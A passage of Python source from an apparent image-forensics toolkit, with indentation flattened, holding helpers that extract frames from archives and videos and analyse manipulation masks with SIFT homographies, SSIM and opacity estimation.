for name in names:
i += 1
elapsed_time = i * fps
if len(file_type_matcher.findall(name.lower())) == 0:
continue
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime() or videoFrameTime is None:
break
extracted_file = myzip.extract(name, os.path.dirname(os.path.abspath(filename)))
img = openImage(extracted_file, isMask=isMask)
if extracted_file != snapshotFileName and snapshotFileName is not None:
img.save(snapshotFileName)
return img
def readFromArchive(filename, filetypes=imagefiletypes, videoFrameTime=None, isMask=False, snapshotFileName=None, fps=30):
import tarfile
import re
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
    archive = tarfile.open(filename, "r:gz")
try:
names = archive.getnames()
names.sort()
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
i = 0
for name in names:
i += 1
elapsed_time = i * fps
if len(file_type_matcher.findall(name.lower())) == 0:
continue
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime() or videoFrameTime is None:
break
if names:
extracted_file = archive.extract(name, os.path.dirname(os.path.abspath(filename)))
img = openImage(extracted_file, isMask=isMask)
else:
extracted_file =''
img = openImage('')
if extracted_file != snapshotFileName and snapshotFileName is not None:
img.save(snapshotFileName)
return img
finally:
archive.close()
def readImageFromVideo(filename, videoFrameTime=None, isMask=False, snapshotFileName=None):
cap = cv2api.cv2api_delegate.videoCapture(filename, useFFMPEGForTime=False)
bestSoFar = None
bestVariance = -1
maxTry = 20
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
try:
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame = frame[..., ::-1]
elapsed_time = cap.get(cv2api.cv2api_delegate.prop_pos_msec)
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime():
bestSoFar = frame
break
varianceOfImage = math.sqrt(ndimage.measurements.variance(frame))
if frame is not None and bestVariance < varianceOfImage:
bestSoFar = frame
bestVariance = varianceOfImage
maxTry -= 1
if not videoFrameTime and maxTry <= 0:
break
finally:
cap.release()
if bestSoFar is None:
logging.getLogger('maskgen').error(
"{} cannot be read by OpenCV/ffmpeg. Mask generation will not function properly.".format(filename))
return outputVideoFrame(filename, outputName=snapshotFileName, videoFrameTime=videoFrameTime, isMask=isMask)
else:
img = ImageWrapper(bestSoFar, to_mask=isMask)
if snapshotFileName is not None and snapshotFileName != filename:
img.save(snapshotFileName)
return img
def md5_of_file(filename, raiseError=True, load_size=500000000):
import hashlib
import os
try:
size = os.stat(filename).st_size
with open(filename, 'rb') as rp:
if size < load_size:
return hashlib.md5(rp.read()).hexdigest()
else:
m = hashlib.md5()
while True:
b = rp.read(load_size)
if b is not None and len(b) > 0:
m.update(b)
else:
break
return m.hexdigest()
except Exception as e:
if raiseError:
raise e
return ''
def uniqueId():
import time
return str(time.time()).replace('.', '')
def shortenName(name, postfix, identifier=None):
import hashlib
middle = ''.join([(x[0] + x[-1] if len(x) > 1 else x) for x in name.split('_')])
if identifier is not None:
middle = middle + '_' + str(identifier)
return hashlib.md5(name + postfix).hexdigest() + '_' + middle + '_' + postfix
class ImageOpener:
def __init__(self):
pass
def openImage(self, filename, isMask=False, args=None):
try:
img = openImageFile(filename, isMask=isMask, args=args)
return img if img is not None else openImage(get_icon('RedX.png'))
except Exception as e:
logging.getLogger('maskgen').warning('Failed to load ' + filename + ': ' + str(e))
return openImage(get_icon('RedX.png'))
class AudioOpener(ImageOpener):
def __init__(self):
ImageOpener.__init__(self)
def openImage(self, filename, isMask=False, args=None):
return ImageOpener.openImage(self, get_icon('audio.png'))
class VideoOpener(ImageOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
self.videoFrameTime = videoFrameTime
self.preserveSnapshot = preserveSnapshot
ImageOpener.__init__(self)
def openSnapshot(self, filename, snapshotFileName):
return os.path.exists(snapshotFileName) and \
os.stat(snapshotFileName).st_mtime >= os.stat(filename).st_mtime
def openImage(self, filename, isMask=False, args=None):
if not ('video' in getFileMeta(filename)):
return ImageOpener.openImage(self, get_icon('audio.png'))
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readImageFromVideo(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
class ZipOpener(VideoOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
VideoOpener.__init__(self, videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
def openImage(self, filename, isMask=False, args=None):
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readFromZip(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
class CollectionOpener(ImageOpener):
def __init__(self):
ImageOpener.__init__(self)
def openImage(self, filename, isMask=False, args=None):
return ImageOpener.openImage(self, get_icon('zip.jpg'))
class TgzOpener(VideoOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
VideoOpener.__init__(self, videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
def openImage(self, filename, isMask=False, args=None):
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readFromArchive(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
def getContentsOfZip(filename):
from zipfile import ZipFile
with ZipFile(filename, 'r') as inzip:
names = inzip.namelist()
names.sort()
return names
def condenseZip(filename, outputfile=None, filetypes=None, keep=2):
from zipfile import ZipFile
import re
filetypematcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')') \
if filetypes is not None else re.compile('.*')
fn = os.path.splitext(filename)[0] + '_c' + os.path.splitext(filename)[1] if outputfile is None else outputfile
cleanup = []
try:
with ZipFile(fn, 'w') as outzip:
with ZipFile(filename, 'r') as inzip:
names = inzip.namelist()
names.sort()
extensions = {}
for i in range(len(names)):
name = names[i]
extension = os.path.splitext(name)[1]
if len(filetypematcher.findall(name)) == 0:
continue
if extension not in extensions:
extensions[extension] = 1
else:
extensions[extension] += 1
dir = os.path.dirname(os.path.abspath(filename))
extracted_file = os.path.join(dir, name)
cleanup.append(extracted_file)
if extensions[extension] <= keep:
extracted_file = inzip.extract(name, dir)
outzip.write(extracted_file, name)
else:
with open(extracted_file, 'wb') as fp:
fp.flush()
outzip.write(extracted_file, name)
finally:
for filename in cleanup:
if os.path.exists(filename):
os.remove(filename)
def openImage(filename, videoFrameTime=None, isMask=False, preserveSnapshot=False, args=None):
"""
Open and return an image from the file. If the file is a video, find the first non-uniform frame.
    If videoFrameTime (milliseconds and frame count) is provided, then find the frame after that point in time.
    preserveSnapshot, False by default, informs the function to save the extracted frame image for videos.
"""
import os
if not os.path.exists(filename):
logging.getLogger('maskgen').warning(filename + ' is missing.')
if not filename.endswith('icons/RedX.png'):
return openImage(get_icon('RedX.png'))
return None
prefix = os.path.splitext(filename)[1][1:].lower()
opener = ImageOpener()
if prefix in ['avi', 'mp4', 'mov', 'flv', 'qt', 'wmv', 'm4p', 'mpeg', 'mpv',
'm4v', 'mts', 'mpg'] or fileType(filename) == 'video':
opener = VideoOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif prefix in ['zip', 'gz']:
if fileType(filename) == 'collection':
opener = CollectionOpener()
else:
opener = ZipOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif prefix in [ 'tgz']:
if fileType(filename) == 'collection':
opener = CollectionOpener()
else:
opener = TgzOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif fileType(filename) == 'audio':
opener = AudioOpener()
return opener.openImage(filename, isMask=isMask, args=args)
def interpolateMask(mask, startIm, destIm, invert=False, arguments=dict()):
"""
:param mask:
    :param startIm:
    :param destIm:
    :param invert:
    :param arguments:
    :return:
    @type mask: ImageWrapper
    @type startIm: ImageWrapper
    @type destIm: ImageWrapper
"""
maskInverted = mask if invert else mask.invert()
mask = np.asarray(mask)
mask = mask.astype('uint8')
logger = logging.getLogger('maskgen')
try:
mask1 = convertToMask(startIm).to_array() if startIm.has_alpha() else None
logger.debug('SIFT')
TM, matchCount = __sift(startIm, destIm, mask1=mask1, mask2=maskInverted, arguments=arguments)
except:
TM = None
if TM is not None:
logger.debug('WARP')
newMask = cv2.warpPerspective(mask, TM, (startIm.size[0], startIm.size[1]), flags=cv2.WARP_INVERSE_MAP,
borderMode=cv2.BORDER_CONSTANT, borderValue=255)
analysis = {}
analysis['transform matrix'] = serializeMatrix(TM)
return newMask, analysis
elif getValue(arguments,'homography','None') != 'None':
        logger.debug('SIFT failed. Finding contours')
try:
contours, hier = cv2api.findContours(255 - mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
minpoint = None
maxpoint = None
for contour in contours:
for point in contour:
if type(point[0]) is np.ndarray:
point = point[0]
if minpoint is None:
minpoint = point
else:
minpoint = (min(minpoint[0], point[0]), min(minpoint[1], point[1]))
if maxpoint is None:
maxpoint = point
else:
maxpoint = (max(maxpoint[0], point[0]), max(maxpoint[1], point[1]))
w = maxpoint[0] - minpoint[0] + 1
h = maxpoint[1] - minpoint[1] + 1
x = minpoint[0]
y = minpoint[1]
if (startIm.size[0] - w) == 0 and (startIm.size[1] - h) == 0:
return mask[y:y + h, x:x + w], {}
except:
return None, None
return None, None
def serializeMatrix(m):
if m is None:
return None
data = {'r': m.shape[0],'c':m.shape[1]}
for r in range(m.shape[0]):
data['r' + str(r)] = list(m[r, :])
return data
def deserializeMatrix(data):
if data is None:
return None
m = np.zeros((int(data['r']), int(data['c'])))
for r in range(m.shape[0]):
m[r, :] = data['r' + str(r)]
return m
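# Illustrative round trip (not part of the original module):
#   data = serializeMatrix(np.eye(3))   # {'r': 3, 'c': 3, 'r0': [1.0, 0.0, 0.0], ...}
#   deserializeMatrix(data)             # the 3x3 identity matrix again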
def redistribute_intensity(edge_map):
"""
    Produce an intensity_map that redistributes the intensity values found in the edge_map evenly over 1 to 255
    :param edge_map: contains a map between an edge identifier (s,e) and an intensity value from 1 to 255 and possibly a color
    :return: map of intensity value from the edge map to a replacement intensity value
@type edge_map {(str,str): (int,[])}
"""
levels = [x[0] for x in edge_map.values()]
colors = [str(x[1]) for x in edge_map.values() if x[1] is not None]
unique_colors = sorted(np.unique(colors))
intensities = sorted(np.unique(levels))
intensity_map = [0]
if len(unique_colors) == len(intensities):
for x in edge_map.values():
intensity_map[x[0]] = x[1]
return intensity_map
increment = int(16777216 / (len(intensities) + 1))
for pos in range(len(intensities)):
v = (pos + 1) * increment
intensity_map.append([(v % 65536) / 256, v / 65536, (v % 65536) % 256])
for k, v in edge_map.iteritems():
edge_map[k] = (v[0], intensity_map[v[0]])
#im = np.zeros((500,500,3)).astype('uint8')
#pos = 0
#for i in intensity_map:
# im[pos,:] = i
# pos+=1
#ImageWrapper(im).save('foo.png')
return intensity_map
def maskToColorArray(img, color=[0, 0, 0]):
"""
Create a new image setting all white to the color and all black to white.
:param img:
:param color:
:return:
@type img: ImageWrapper
@rtype ImageWrapper
"""
imarray = np.asarray(img)
rgb = np.ones((imarray.shape[0], imarray.shape[1], 3)).astype('uint8') * 255
rgb[imarray == 0, :] = color
return rgb
def toColor(img, intensity_map={}):
"""
Produce an image that changes gray scale to color.
First, set the intensity values of each pixel using the intensity value from the intensity map
Then use a color map to build a color image
Then repopulate the edge_map with the assigned color for each edge
:param img gray scale image
:param intensity_map intensity value mapped to its replacement
:return the new color image
"""
result = cv2.applyColorMap(img.astype('uint8'), cv2.COLORMAP_HSV)
for old, new in intensity_map.iteritems():
result[img == old] = new
result[img == 0] = [255, 255, 255]
return result
def toComposite(img):
"""
Convert to a mask with white indicating change
:param img gray scale image
:return image
"""
result = np.zeros(img.shape).astype('uint8')
result[img > 0] = 255
return result
def toIntTuple(tupleString):
import re
if tupleString is not None and tupleString.find(',') > 0:
return tuple([int(re.sub('[()L]', '', x)) for x in tupleString.split(',')])
return 0, 0
def sizeOfChange(mask):
if len(mask.shape) == 2:
return mask.size - sumMask(mask == 255)
else:
mask_size = mask.shape[0] * mask.shape[1]
return mask_size - sumMask(np.all(mask == [255, 255, 255], axis=2))
def maskChangeAnalysis(mask, globalAnalysis=False):
mask = np.asarray(mask)
totalPossible = reduce(lambda a, x: a * x, mask.shape)
totalChange = sumMask(mask.astype('float32')) / 255.0
ratio = float(totalChange) / float(totalPossible)
globalchange = True
if globalAnalysis:
globalchange = ratio > 0.75
(x, y), (w, h) = boundingRegion(mask)
area = float(w*h)
region = mask[x:x+w,y:y+w]
np.diff(np.where(region > 0)[1])
xhist = np.histogram(np.where(region > 0)[0],bins=min(256,region.shape[0]))[0]
        yhist = np.histogram(np.where(region > 0)[1], bins=min(256, region.shape[1]))[0]
dispersion = xhist[0] > 0 and xhist[-1] > 0 and yhist[0] > 0 and yhist[-1] > 0
globalchange |= (area/totalPossible > 0.75) and dispersion
return globalchange, 'small' if totalChange < 2500 else ('medium' if totalChange < 10000 else 'large'), ratio
def SSIMAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
globalchange = img1.size != img2.size
img1, img2 = __alignChannels(img1, img2)
    analysis['ssim'] = compare_ssim(np.asarray(img1), np.asarray(img2), multichannel=False)
if mask is not None:
mask = np.copy(np.asarray(mask))
mask[mask > 0] = 1
analysis['local ssim'] = ssim(img1 * mask, img2 * mask, mask, R=65536)
return globalchange
def globalTransformAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
"""
Determine if operation is global. Capture 'change size ratio' and 'change size category'.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
globalchange = img1.size != img2.size
totalChange = ''
ratio = 1.0
if mask is not None:
globalchange, totalChange, ratio = maskChangeAnalysis(mask, not globalchange)
analysis['global'] = arguments['global operation'] if 'global operation' in arguments else \
('yes' if globalchange else 'no')
analysis['change size ratio'] = ratio
analysis['change size category'] = totalChange
return globalchange
def localTransformAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
"""
Non-global operations, capturing 'change size ratio' and 'change size category'.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
globalchange = globalTransformAnalysis(analysis, img1, img2,
mask=mask,
linktype=linktype,
arguments=arguments,
directory=directory)
analysis['global'] = 'no'
return globalchange
def forcedSiftWithInputAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status, using an input mask from the parameters
to select the source region.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments: parameters
:return:
"""
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
if 'inputmaskname' in arguments:
inputmask = openImageFile(os.path.join(directory, arguments['inputmaskname'])).to_mask().to_array()
        # somewhat arbitrary: if the input mask differs from the change mask by 75% or more, isolate the regions
        # highlighted by the input mask; otherwise just use the change mask for the transform. The change mask
        # should be the full set of changed pixels and the input mask a subset of those pixels.
if sumMask(abs((mask.image_array - inputmask) / 255)) / float(sumMask(mask.image_array / 255)) >= 0.75:
# want mask2 to be the region moved to
mask2 = mask - inputmask
# mask1 to be the region moved from
mask = inputmask
else:
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
else:
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def forcedSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:return:
"""
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def seamAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
    Perform SIFT regardless of the global change status. If a neighbor mask is constructed, indicating the seams
    can be calculated, then mark the change as not global.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
forcedSiftAnalysis(analysis, img1, img2, mask=mask, linktype=linktype, arguments=arguments, directory=directory)
if 'neighbor mask' in arguments:
analysis['global'] = 'no'
def rotateSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
If the image is rotated by values other than factors of 90 degrees, use SIFT to build a homography.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
import copy
rot = float(getValue(arguments,'rotation',-1))
is_local = getValue(arguments,'local',True)
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if abs(rot % 90)<0.001 and not is_local:
return
if is_local:
return siftAnalysis(analysis, img1, img2, mask=mask, linktype=linktype, arguments=arguments, directory=directory)
# global case and not a factor of 90
# skip video
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
serializedMatrix = getValue(arguments,'transform matrix')
if serializedMatrix is None:
args = copy.copy(arguments)
(x,y),(w,h) = boundingRegion(mask.invert().image_array)
if (w-x + h-y) > 0.5*(mask.size[0] + mask.size[1]):
args['Matcher.TREES'] = 6
args['Matcher.CHECKS'] = 20
matrix,matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=args)
if matrix is not None and isHomographyOk(matrix,img1.size[1],img1.size[0]):
analysis['transform matrix'] = serializeMatrix(matrix)
else:
analysis['transform matrix'] = serializedMatrix
def siftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Use SIFT to build a homography for transform type changes that manipulated prior masks for probes.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
if globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments):
return
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def boundingRegion(mask):
x, y, w, h = widthandheight(mask)
return (x, y), (x + w, y + h)
def boundingRectange(mask):
allpoints = []
contours, hierarchy = cv2api.findContours(np.copy(mask), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for i in range(0, len(contours)):
cnt = contours[i]
allpoints.extend(cnt)
hull = cv2.convexHull(np.asarray(allpoints))
return cv2.minAreaRect(hull)
def _affineTransformDonorImage(initialImage, donorImage, mask, donorMask):
dims = initialImage.shape[2]
IM = (255 - mask)
IDM = (255 - donorMask)
mcenter, mdims, mrotation = boundingRectange(IM)
dcenter, ddims, drotation = boundingRectange(IDM)
ratiox = float(donorImage.shape[0]) / float(initialImage.shape[0])
ratioy = float(donorImage.shape[1]) / float(initialImage.shape[1])
scale = min(float(mdims[0]) * ratiox / ddims[0], float(mdims[1]) * ratioy / ddims[1])
M = cv2.getRotationMatrix2D(mcenter, drotation - mrotation, scale)
IDM3 = np.zeros((donorImage.shape[0], donorImage.shape[1], dims))
IM3 = np.zeros((initialImage.shape[0], initialImage.shape[1], dims))
for i in range(dims):
IDM3[:, :, i] = IDM
IM3[:, :, i] = IM
donorImageSelection = donorImage[:, :, 0:dims] * IDM3
return cv2.warpAffine(donorImageSelection, M, (initialImage.shape[1], initialImage.shape[0]))
def generateOpacityImage(initialImage, donorImage, outputImg, mask, donorMask, tm):
"""
Assume opacity is o such that
outputImg = initialImage*(mask/255) + initialImage*((255-mask)/255)*(1-o) + donorImage*o*((255-donormask)/255)
IM = inverted mask
IDM = inverted donor mask
outputImg - initialImage*(mask/255) = initialImage*IM - initialImage*IM*o + donorImage*o*((255-donormask)/255)
outputImg - initialImage*(mask/255) - initialImage*IM = donorImage*IDM*o - initialImage*IM*o
outputImg - initialImage = donorImage*IDM*o - initialImage*IM*o
outputImg - initialImage = o * (donorImage*IDM - initialImage*IM)
o = (outputImg - initialImage)/(donorImage*IDM - initialImage*IM)
    This is challenging since the donor mask is not lined up with the image exactly.
    :param initialImage:
    :param donorImage:
    :param outputImg:
    :param mask:
    :param donorMask:
    :param tm: optional transform matrix aligning the donor image to the initial image
:return:
"""
dims = initialImage.shape[2]
IDM = (255 - donorMask) / 255
IM = (255 - mask) / 255
IDM3 = np.zeros((donorImage.shape[0], donorImage.shape[1], dims))
IM3 = np.zeros((initialImage.shape[0], initialImage.shape[1], dims))
for i in range(dims):
IDM3[:, :, i] = IDM
IM3[:, :, i] = IM
donorImageSelection = (donorImage[:, :, 0:dims] * IDM3)
if tm is not None:
transformedImageAligned = cv2.warpPerspective(donorImageSelection, tm,
(initialImage.shape[1], initialImage.shape[0]),
flags=cv2.INTER_LINEAR,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
else:
transformedImageAligned = _affineTransformDonorImage(initialImage, donorImage, mask, donorMask).astype('uint8')
# r = i(1-o) + t*o
# r = i - o*i + t*o
# r-i = o*t - o*i
# r-i= o(t-i)
# o = (r-i)/(t-i)
diffDonorImage = abs(transformedImageAligned * IM3 - initialImage * IM3).astype('float32')
diffOutputImage = abs(outputImg[:, :, 0:dims] * IM3 - initialImage * IM3).astype('float32')
result = np.zeros(diffOutputImage.shape)
result[diffDonorImage > 0.0] = diffOutputImage[diffDonorImage > 0] / diffDonorImage[diffDonorImage > 0.0]
result[np.isinf(result)] = 0.0
result[result > 1] = 1.0
if dims > 3:
result[:, :, 3] = 1
return result
def generateOpacityColorMask(initialImage, donorImage, outputImg, mask, donorMask):
result = generateOpacityImage(initialImage, donorImage, outputImg, mask, donorMask)
min = np.min(result)
max = np.max(result)
return (result - min) / (max - min) * 255.0
def optionalSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
    If 'location change' is not in the parameters or 'location change' is 'no', skip this step.
    Otherwise, use SIFT to find a homography.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
if 'location change' not in arguments or arguments['location change'] == 'no':
return
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
if matrix is not None:
analysis['transform matrix'] = serializeMatrix(matrix)
def createMask(img1, img2, invert=False, arguments={}, alternativeFunction=None, convertFunction=None):
mask, analysis, error = __composeMask(img1,
img2,
invert,
arguments=arguments,
alternativeFunction=alternativeFunction,
convertFunction=convertFunction)
analysis['shape change'] = sizeDiff(img1, img2)
if 'location' not in analysis:
analysis['location'] = '(0,0)'
analysis['empty mask'] = 'yes' if np.all(mask == 255) else 'no'
return ImageWrapper(mask), analysis, error
def __indexOf(source, dest):
positions = []
for spos in range(len(source)):
for dpos in range(len(dest)):
if (source[spos] == dest[dpos]).all():
positions.append(spos)
break
return positions
def __flannMatcher(d1, d2, args=None):
FLANN_INDEX_KDTREE = 0
TREES = 16
CHECKS = 50
if 'Matcher.CHECKS' in args:
CHECKS = int(args['Matcher.CHECKS'])
if 'Matcher.TREES' in args:
TREES = int(args['Matcher.TREES'])
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=TREES)
search_params = dict(checks=CHECKS)
flann = cv2.FlannBasedMatcher(index_params, search_params)
return flann.knnMatch(d1, d2, k=2) if d1 is not None and d2 is not None else []
def getMatchedSIFeatures(img1, img2, mask1=None, mask2=None, arguments=dict(), matcher=__flannMatcher):
img1 = img1.to_rgb(data_type=np.uint8).apply_mask(mask1).to_array()
img2 = img2.to_rgb(data_type=np.uint8).apply_mask(mask2).to_array()
threshold = arguments['sift_match_threshold'] if 'sift_match_threshold' in arguments else 10
maxmatches = int(arguments['homography max matches']) if 'homography max matches' in arguments else 10000
def getRange(size, segment_size=2048):
"""
        Divide up the size into segment_size ranges
        :param size:
        :param segment_size:
        :return: list of ranges represented as tuples (start, end, last-range indicator)
"""
ranges = [(x * segment_size, min((x + 1) * segment_size, size), False) for x in range(size / segment_size + 1)]
if ranges[-1][1] - ranges[-1][0] < segment_size and len(ranges) > 1:
ranges = ranges[:-2] + [(ranges[-2][0],ranges[-1][1], True)]
else:
ranges[-1] = (ranges[-1][0], ranges[-1][1], True)
return ranges
def updateKP(kp,pos):
kp.pt = (kp.pt[0]+pos[0], kp.pt[1]+pos[1])
return kp
def filterKP(pt, xstart, xend, ystart, yend):
"""
Filter out points outside the 'window' surrounded by the buffer
:param pt:
:param xstart:
:param xend:
:param ystart:
:param yend:
:return:
"""
return \
(pt[0] >= xstart and pt[0] <= xend) and \
(pt[1] >= ystart and pt[1] <= yend)
def computeSIFTOverRanges(img1,buffer_size=16, segment_size=2048):
total_kp = []
total_d = None
for xrange in getRange(img1.shape[0]):
for yrange in getRange(img1.shape[1]):
(kp, ds) = cv2api.cv2api_delegate.computeSIFT(
img1[max(0,xrange[0]-buffer_size):min(xrange[1]+buffer_size,img1.shape[0]),
max(0,yrange[0]-buffer_size):min(yrange[1]+buffer_size,img1.shape[1])])
xstart = buffer_size - 1 if xrange[0] > 0 else 0
xend = segment_size*2 if xrange[2] else (segment_size + \
(0 if xrange[0] == 0 else buffer_size))
ystart = buffer_size - 1 if yrange[0] > 0 else 0
yend = segment_size*2 if yrange[2] else (segment_size + \
(0 if yrange[0] == 0 else buffer_size))
kept = [kpi for kpi in range(len(kp)) if filterKP(kp[kpi].pt,
xstart,xend,
ystart,yend)]
total_kp.extend([updateKP(kp[kpi],(xrange[0],yrange[0])) for kpi in kept])
if ds is not None:
ds = ds[kept,:]
if total_d is None:
total_d = ds
else:
total_d = np.concatenate((total_d,ds))
return total_kp,total_d
(kp2, d2) = computeSIFTOverRanges(img2)
if kp2 is None or len(kp2) == 0:
return None
(kp1, d1) = computeSIFTOverRanges(img1)
if kp1 is None or len(kp1) == 0:
return None
d1 /= (d1.sum(axis=1, keepdims=True) + 1e-7)
d1 = np.sqrt(d1)
d2 /= (d2.sum(axis=1, keepdims=True) + 1e-7)
d2 = np.sqrt(d2)
matches = matcher(d1,d2, args=arguments)
# store all the good matches as per Lowe's ratio test.
good = [m for m, n in matches if m.distance < 0.75 * n.distance]
    good = sorted(good, key=lambda g: g.distance)
good = good[0:min(maxmatches, len(good))]
if len(good) >= threshold:
src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
return (src_pts, dst_pts) if src_pts is not None else None
return None
def _remap(img, mask, src_pts, dst_pts):
from scipy.interpolate import griddata
long = mask.reshape(mask.shape[0] * mask.shape[1])
grid_x, grid_y = np.mgrid[0:mask.shape[0], 0:mask.shape[1]]
grid_z = griddata(np.array(dst_pts),
np.array(src_pts), (grid_x, grid_y), method='cubic', rescale=True)
map_x = np.append([], [ar[:, 0] for ar in grid_z])
map_y = np.append([], [ar[:, 1] for ar in grid_z])
default_x = np.append([], [ar for ar in grid_x])
default_y = np.append([], [ar for ar in grid_y])
# remove remaps outside the mask
map_x[long == 0] = default_x[long == 0]
map_y[long == 0] = default_y[long == 0]
# fix nan's with no mapping
jj = np.where(np.isnan(map_x))
map_x[jj] = default_x[jj]
jj = np.where(np.isnan(map_y))
map_y[jj] = default_y[jj]
map_x_32 = map_x.astype('float32').reshape(mask.shape)
map_y_32 = map_y.astype('float32').reshape(mask.shape)
return cv2.remap(img, map_y_32, map_x_32, cv2.INTER_NEAREST)
def __grid(img1, img2, compositeMask, edgeMask=None, arguments=None):
"""
    Compute a sparse remapping of the composite mask from matched points between img1 and img2
    :param img1:
    :param img2:
    :param compositeMask:
    :param edgeMask:
    @type img1: ImageWrapper
    @type img2: ImageWrapper
    :return: the remapped composite mask, or the original composite mask if no matches are found
"""
src_dts_pts = getMatchedSIFeatures(img1, img2, mask1=edgeMask, mask2=None, arguments=arguments)
if src_dts_pts is None:
return compositeMask
newMask = _remap(compositeMask, edgeMask,
[[x[0][1], x[0][0]] for x in src_dts_pts[0].astype('int')],
[[x[0][1], x[0][0]] for x in src_dts_pts[1].astype('int')])
# r = np.zeros(r.shape).astype('uint8')
# for x in range(len(src_dts_pts[1])):
# cv2.line(r,tuple(src_dts_pts[0][x][0]),tuple(src_dts_pts[1][x][0]),255)
# r[int(x[0][1]),int(x[0][0])] = 255
return newMask
def __sift(img1, img2, mask1=None, mask2=None, arguments=None):
"""
    Compute homography to transform img1 to img2
    Apply the mask to each in order to only compare relevant regions of the images
